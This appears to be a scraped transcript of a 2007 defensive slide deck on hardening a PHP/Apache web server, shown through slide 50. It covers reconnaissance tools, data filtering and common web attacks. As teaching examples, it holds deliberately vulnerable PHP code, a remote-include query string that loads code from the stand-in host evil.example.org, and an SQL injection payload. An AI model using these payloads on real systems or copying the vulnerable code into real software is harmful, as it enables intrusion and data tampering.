1 / 100

Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache

Learn how to set up a secure personal web server using PHP and Apache on a Windows platform. This tutorial covers installation, hardening, and security measures to protect against common vulnerabilities.

aubrie
Download Presentation

Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache Created By: John Gibbons November 27th, 2007

  2. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  3. Overview • PHP • Terminology • Vulnerabilities • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  4. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  5. Overview • Installing a Personal Web Server • XAMPP • Installation • Hardening Security • Updates

  6. Overview • Review • Conclusion • Sources • Questions

  7. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  8. Background • Apache and PHP are free, open source web development tools. • Apache • In development since 1995 • Software that allows a computer to act as a web server • PHP • Server side HTML embedded scripting language • Allows for the creation of dynamic web pages

  9. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  10. NMAP • Open source tool common used by hackers • Host Discovery • Identifying computers on a network • Port Scanning • Enumerating the open ports on one or more target computers

  11. NMAP • Version Detection • Interrogating listening network services listening on remote computers to determine the application name and version number. • Detection • Remotely determining the operating system and some hardware characteristics of network devices

  12. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  13. Intellitamper • Upon discovering desired (vulnerable) ports/services, directories can be mapped • Attackers can view directories they were not meant to see

  14. Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois

  15. Whois

  16. Whois

  17. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  18. PHP Terminology • Public Scripts: Scripts available via a URL • White list: Assuming input to be invalid until proven valid • Data Filtering: Examining data from an external source to ensure it meets the criteria to be considered valid

  19. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  20. PHP Security • Data Filtering • Initialize all variables • Filter all data that comes from an external source • Develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development • Having error_reporting set to E_ALL will help to enforce the initialization of variables, because a reference to an undefined variable generates a notice • Consider all data invalid until it is proven valid

  21. PHP Security • Data Filtering Guidelines • Ensure that data filtering cannot bypassed • Ensure that invalid data cannot be mistaken for valid data • Identify the origin of the data

  22. PHP Security • Register Globals • Disabled by default (version 4.2.0 and greater) • Prevents regular globals from affecting data submitted by the client

  23. PHP Security • Register Globals Example if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } • This page can be requested with ?authorized=1 in the query string to bypass the intended access control

  24. PHP Security • Register Globals Example: include "$path/script.php"; • This page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F • In the query string in order to equate this example to the following: include 'http://evil.example.org/?/script.php'; • If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://evil.example.org/ just as if it were a local file

  25. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  26. PHP Data Filtering • The following validates an email address: <?php $clean = array(); $email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i'; if (preg_match($email_pattern, $_POST['email'])) { $clean['email'] = $_POST['email']; } ?>

  27. PHP Data Filtering • The following example ensures that $_POST['num'] is an integer: <?php $clean = array(); if ($_POST['num'] == strval(intval($_POST['num']))) { $clean['num'] = $_POST['num']; } ?>

  28. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  29. PHP Naming Conventions • Take a white list approach • Use variable names that are easy to identify as valid • $clean from previous example • Never leave variables in the $_GET and $_POST arrays because they are not easily identifiable as valid

  30. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  31. PHP Timing • Once a PHP script begins to run, the HTTP request has been received • The user no longer has the opportunity to send data • This makes data initialization a very good practice

  32. Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting

  33. PHP Error Reporting • error_reporting • Sets level of error reporting • Set to E_ALL for both development and production • error_reporting (E_ALL); • display_errors • Displays errors on screen • Use during development • Disable during production • Could be useful for potential attackers

  34. PHP Error Reporting • log_errors • Should be turned on during production • Will only induce a performance hit if there is a serious number of errors • error_log • Dictates the location for the error log • The web server should have write privileges for this file

  35. PHP Error Reporting • NEW • As of PHP 5.0, there is E_STRICT • not included within E_ALL • useful during development • warns about using depreciated functions

  36. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  37. SQL: Exposed Access Credentials • Many PHP applications interact with a database • Credentials, used for authentication, are sometimes stored in a plain text file: <?php $host = 'example.org'; $username = 'myuser'; $password = 'mypass'; $db = mysql_connect($host, $username, $password); ?>

  38. SQL: Exposed Access Credentials • The previous example would be stored in a file called “db.inc” . • This file in included whenever database access is needed. • This approach offers convinience by storing all credentials in a single file.

  39. SQL: Exposed Access Credentials • Potential problems arise when a document containing credentials is stored somewhere within the document root. • Every document within the document root as a URL associated with it. • Despite not publicly linking to the document, if it is stored in the inappropriate place, it will still be accessible to an attacker.

  40. SQL: Exposed Access Credentials • A simple solution is to place this files, and all modules, outside of the document root. • Both include and require can accept file system paths

  41. SQL: Exposed Access Credentials • Another solution is to place the following in the “httpd.conf” file (this file is only used with apache) <Files ~ "\.inc$"> Order allow,deny Deny from all </Files>

  42. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  43. SQL Injection • Result of data not being filtered. • Example: <?php $sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('{$_POST['reg_username']}', '$reg_password', '{$_POST['reg_email']}')"; ?>

  44. SQL Injection • This simple example allows the user to input a user name, password, and email address in order to create an account. • However, without data filtering, an attacker could enter the following into the user name field: bad_guy', 'mypass', ''), ('good_guy

  45. SQL Injection • Assume the attacker gives a valid email address and the application generates the password “1234” • The SQL statement becomes: $sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('bad_guy', 'mypass', ''), ('good_guy', '1234', 'shiflett@php.net')";

  46. SQL Injection • The attacker has successfully created two accounts, and was able to supply all the information for the “bad guy” account. • The automatically generated password was bypassed

  47. SQL Injection: Protection • Filter your data • Escape your data • Valid input may interfere with SQL formatting. • Use functions native to your database to handle escaping any characters that may interfere. • i.e. mysql_escape_string()

  48. Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking

  49. Cross Site Scripting (XSS) • Exploit the trust a user has for a particular site. • Users don't necessarily have a high level of trust for any web site, but the browser does. For example, when the browser sends cookies in a request, it is trusting the web site. Users may also have different browsing habits or even different levels of security defined in their browser depending on which site they are visiting.

  50. Cross Site Scripting (XSS) • Generally involve web sites that display external data. • Applications at a heightened risk include forums, web mail clients, and anything that displays syndicated content (such as RSS feeds).

More Related